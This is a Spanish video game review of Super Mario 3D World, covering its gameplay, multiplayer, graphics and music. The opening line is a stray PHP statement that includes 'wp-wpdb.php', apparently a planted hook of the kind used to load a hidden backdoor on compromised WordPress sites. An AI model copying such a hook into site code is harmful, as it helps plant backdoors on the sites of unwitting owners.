if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Super Mario 3D World – La Fortaleza de LeChuck

Análisis Super Mario 3D World

El género de las plataformas, como tantos otros géneros, parece estar de capa caída en los últimos tiempos. Los juegos de acción, en primera y tercera persona, parecen adueñarse del mercado, y parece ser lo más solicitado por parte del público, quizás por su aspecto más realista. Por suerte, los plataformas nunca han necesitado de maravillas técnicas para ser divertidos, y hay algunos títulos que todavía consiguen traer diversión y nuevas posibilidades. Super Mario 3D World es uno de ellos ¡Averigua por qué!
Super Mario 3D World

La idea que teníamos todos antes de catar este Super Mario 3D World, de un «Super Mario 3D Land» en grande, se acerca algo a la propuesta de este Super Mario 3D World, y creo que eso no es para nada malo. Esta nueva etiqueta dentro de la saga plataformera de Mario, comporta unos mundos pequeños, bastante limitados en espacio y absolutamente lineales. Creo que estoy describiendo a cualquiera de los antiguos Marios y ahí quería llegar, Super Mario 3D World toma la idea de «3D Land» vitaminándola con muchos más objetos, ítems, posibilidades y multijugador ¡La diversión parece asegurada!

Si hay algo absurdo en el mundo de los videojuegos, es jugar a un juego de Mario por la historia, pues normalmente son una simple excusa para pegar brincos por un escenario. En todo caso, todos la tienen para darle un toque aventurero, y al menos esta vez no secuestran a la Princesa Peach (puesto que es un personaje jugable). Bowser ha secuestrado esta vez a unas pequeñas hadas y las ha embotellado, la última de ellas en libertad alcanza a pedirnos ayuda antes de ser cazada, y ahí da comienzo esta nueva aventura, esta vez acompañados de Peach, Luigi y Toad.

Jugabilidad

Parece que WiiU se está haciendo experta en tener buenas experiencias multijugador local (Sí, Super Mario 3D World carece de juego online), y con Super Mario 3D World lo vuelve a demostrar, ya que podremos jugar hasta 4 jugadores, cosa que siempre asegura la diversión ¿Pero que más tiene este SM3DW?

Lo que más me sorprendió no ha sido el nuevo ítem para transformarse en Gato, un ítem protagonista de la promoción del juego que facilita mucho las cosas y nos permitirá trepar por las paredes. Tampoco el ítem de multiplicar a nuestro personaje, que más bien nos vuelve locos y acabaremos con todos desperdigados cayendo inevitablemente en algún enemigo o barranco. Lo que más me sorprende es la variedad en los escenarios. Se ha tratado con esmero el hecho de que aunque cada mundo esté ambientado de la misma forma, los niveles dentro de cada uno de ellos puedan sorprenderte y no usar la misma idea en cada uno de los niveles haciéndolo solamente más difícil. ¿Un ejemplo? Por ejemplo el típico mundo nevado, no nos trae todo el rato los típicos escenarios constantemente de hielo en los que resbalas todo el rato, si no que intentan ser originales en cada nivel para no repetir la fórmula continuamente.
Super Mario 3D World

A la hora de escoger niveles, el mapamundi, se ha creado de una forma algo más interactiva, más libre. En el nos podremos encontrar enemigos, bonus y hasta unos minijuegos en los que llevaremos a un Toad que no puede saltar, con el que resolveremos un escenario cúbico buscando más estrellas para nuestro bolsillo, vitales para ir desbloqueando mundos nuevos.

La dificultad de Super Mario 3D World está estudiada para que sea fácil «convivir» en el multijugador, al menos hasta las últimas pantallas. Los Marios suelen requerir mucha habilidad para no caerse por los huecos entre plataformas, y digamos que los niveles de Super Mario 3D World tiene menos agujeros para evitar que nuestros colegas invitados en casa no dejen de jugar a primeras de cambio, cosa que en New Super Mario Bros U era fácil que sucediera, si no eran habituales a las plataformas. Así que sí, por ese lado se ha hecho más fácil. Para contentar al jugador más exigente, SM3DW nos brinda sorpresas hacia el final del juego con niveles realmente difíciles, además de la recolección de las tres estrellas escondidas y un sello que podremos utilizar con variedad de diseños en el Miiverse.
Super Mario 3D World

En Super Mario 3D World, no tendremos apenas control sobre la cámara, con ello jugarán los niveles para escondernos los objetos, como sucedía en Super Mario 3D Land. Además, el control de los personajes, aún usando los sticks analógicos, se asemeja mucho al que podríamos tener con una cruceta digital, como si la emulara, por lo que podremos caminar en 8 direcciones muy marcadas, además de mantener presionado un botón para correr, cosa que le da un ritmo diferente a las partidas y un control más encorsetado, quizás para evitar más caídas de las debidas. Aún así, es algo positivo, ya que al recorrer muchos de ellos en diagonal, todo esto hace sencillo el control en ellos, así que se hace notar el buen testeo de Nintendo para que no se nos vaya de las manos por el hecho de no poder mover la cámara.

Por supuesto, han aprovechado para utilizar algunas de las particularidades del Gamepad de WiiU. Podremos jugar con su modo Off TV toda la aventura en nuestro mando, pero no solo eso, también podremos interactuar en el juego con la pantalla táctil y el micrófono, incluso en algunos escenarios será necesario presionar algunas plataformas o soplar, para avanzar en el. La idea está bien implementada, aunque si estás jugando en la TV y si en un nivel  hay que tocar demasiadas cosas, al final terminas jugando en el mando como si de una Nintendo DS se tratara. Lo bueno es que casi nunca es obligatorio y solo es una integración más para aprovechar la capacidad del mando.

Gráficos

Aunque los juegos de Mario no necesitan ser algo más que vistosos para seguir siendo Marios, es cierto que muchos de ellos han sido representantes de las capacidades técnicas de la plataforma donde son lanzados. En Super Mario 3D World tenemos unos personajes y niveles más coloristas y limpios que nunca, gracias a la resolución 1080P que alcanza en WiiU. La solidez es habitual en Nintendo, pero se echa en falta algo más de detalle en los escenarios, además de que se hacen menos apreciables por la lejanía de la cámara. También podemos apreciar algo de desigualdad en el apartado técnico en general del título, algunos escenarios son realmente impresionantes, mientras que otros parecen más que posibles en una Wii e incluso una Gamecube.
Super Mario 3D World

Sonido

Dejando atrás las remezclas de melodías antiguas y «WAP WAP» de los New Mario Bros, esta vez Nintendo ha tratado a este Super Mario 3D World como un Mario más importante de lo habitual, ya que es el juego de las navidades para WiiU, y con el, por supuesto, han puesto toda la carne en el asador para que suene estupendamente. Nueva melodía principal, además de otros temas originales con algunos de ellos orquestados, que incluso a veces nos hará creer que no estamos en el mundo de Mario y más bien en una aventura mucho más profunda. Un 10 para este apartado.

Aunque este Mario no haya sido esperado como un nuevo gran Mario 3D, como sucedió Super Mario 64 o Super Mario Galaxy, gracias a sus frescos ingredientes y la idea de Super Mario 3D Land, logra llegar a divertir tanto a nuevos jugadores como a los más veteranos en el mundo de Mario. Quizás solo se echa en falta más enfoque al modo de un jugador, que es la idea que siempre ha tenido un juego de Mario a sus espaldas, ya que da la sensación que si no juegas con gente es más sencillo y «soso» en general y hasta que llegas a los niveles diseñados para jugadores de Mario veteranos, no da sensación de reto.

Compra Super Mario 3D World al mejor precio gracias a OfertasJuegos.com

Nota: 7 si vas a jugar solo, 9 si jugarás con amigos